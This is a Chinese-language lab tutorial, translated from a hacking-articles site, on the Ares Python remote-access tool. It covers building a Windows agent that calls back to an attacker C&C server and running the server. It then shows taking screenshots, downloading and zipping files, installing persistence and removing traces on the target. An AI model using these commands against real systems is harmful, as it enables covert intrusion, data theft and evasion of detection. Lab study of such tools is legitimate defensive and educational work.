C&C远控工具:Ares

DarkEye 安全工具 2019年4月22日发布
Favorite收藏

导语:这篇文章,我们将来学习Ares这款工具。这款工具可以通过web界面进行C&C控制。

这篇文章,我们将来学习Ares这款工具。这款工具可以通过web界面进行C&C控制。该工具在GitHub可以下载,地址在这里

介绍

Ares是一款Python编写的远程访问工具。Ares由两部分主要程序组成:C&C服务器和客户端,C&C服务器是管理客户端代理的web界面,客户端需要运行在被入侵的主机上,并且确保能够与C&C服务器通信。

下面进行实战演示

· 攻击机:kali Linux

· 靶机:Windows10

安装

首先,我们需要在攻击机中安装此工具。我们可以使用git命令,直接在GitHub中将工具下载到本机。下载好后,我们使用cd命令切换到该目录下,如下图所示:

git clone //github.com/sweetsoftware/Ares.git
cd Ares
ls

1.png

要想让此工具正常运行,我们还需要安装一些依赖和库。可以看到在此工具目录下有一个requirement.txt文件,这个文件包含了我们需要安装的Python库。使用pip命令来安装:

pip install -r requirements.txt

2.png

 

因为我们的靶机是Windows主机,所以我们需要编译客户端来兼容Windows主机。要进行编译的话,我们还需要wine这个工具,不用担心,这个工具在我们下载Ares时已经提供了,现在我们来安装一下,可能会需要一点时间

ls
./wine_setup.sh

3.png

攻击目标

现在我们已经成功地安装好了运行Ares工具所需的所有依赖和库。接下来我们就可以利用该工具来获得C&C会话了。我们需要一个客户端,使用cd命令切换到客户端目录下,然后ls一下查看目录中的文件,可以看到有一个config文件,我们需要编辑这个文件来获取会话

cd agent/
ls
nano config.py

4.png

 

当我们使用nano命令打开配置文件时,可以看到SERVER变量是一个IP地址,这个地址是需要修改的。这里我们把它修改成攻击机的内网IP地址,在这个演示中,攻击机的内网IP地址是192.168.1.4。其他地方不需要再修改了,保存文件即可。

5.png

现在,我们已经对配置文件进行了修改,接下来就是创建客户端了。因为靶机是Windows,所以我们需要创建一个Windows客户端,使用下面的命令来创建:

./builder.py -p Windows –server //192.168.1.4:8080 -o agent.exe

6.png

接着,我们需要把这个客户端发送到靶机中,不管用什么方法都行。发送成功之后,我们需要启动服务器,因为客户端需要与服务器进行通信。启动服务器后,我们回到Ares目录,会发现多了一个server子目录。我们进入到该子目录,接着我们需要开启数据库,这里我们要用到initdb参数,只有在第一次使用时才需要开启数据库。现在,我们可以运行服务器了。

命令如下

ls
cd server/
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

7.png

接着,我们在浏览器中访问我们的服务器IP地址。我们可以看到一个表单,要求我们设置密码,如下图,我们开始设置自己的密码,然后点击Define进行确认。

8.png

OK,密码已经创建好了,我们需要输入密码来登录,如图:

9.png

登录成功之后,我们可以看到Ares GUI界面。该页面中有以下几个链接:修改密码,断开连接,和客户端列表。现在客户端列表是空的,我们需要在靶机中执行了客户端之后,这个客户端列表才会有内容,如图:

10.png

在靶机中执行客户端后,我们在下图中可以看到,有一个客户端上线了。我们可以看到客户端的名称,状态和登录的用户名,还有主机名。我们还能清楚的看到靶机的IP地址和操作系统。当然,我们可以在多个设备中运行客户端,然后在客户端列表中都能一一显示出来。我们可以从多个客户端会话中选择某些会话,然后同时对多个会话执行相同的命令。选择会话名称继续:

11.png

命令执行

因为Ares执行的是powershell的命令,所以这里我们执行一个查看系统信息的命令,也及时systeminfo。执行完之后,我们就可以看到靶机所有的系统配置信息,如下图:

systeminfo

12.png

捕获截图

接着我们来捕获一张靶机的截图。我们需要输入screenshot命令,然后客户端会捕获一张截图,并以链接的形式提供,如下图,打开链接就能看到捕获的截图了

screenshot

13.png

文件下载

我们也可以使用这个客户端从远程靶机上下载文件。当然,要下载文件我们需要知道文件名。我们可以通过dir列目录命令来获取文件名。现在我们知道了文件名,我们就可以下载文件到攻击者的本地机器上了,如下图所示:

download file.txt

14.png

压缩文件

我们还可以利用这个Ares客户端在远程靶机上压缩一个目录。同样,我们需要知道目录名。知道目录名之后,我们就可以使用下面的命令来远程压缩整个目录。这里,我们可以看到有一个sample目录,我们来把它压缩成compressed.zip压缩包,如下图:

zip compressed.zip sample

15.png

持久代理

我们可以在这个客户端中调用持久代理,使用persist命令即可。这条命令会在远程靶机中安装代理,如下图:

persist

16.png

 

迹清理

会话结束,完成我们的目的之后,这个工具还能够进行痕迹清理。下面这条命令将从远程靶机上移除这个代理工具,这样就很难检测到,如下图:

clean

17.png

本文翻译自:https://www.hackingarticles.in/command-control-ares/如若转载,请注明原文地址: https://www.4hou.com/tools/17527.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论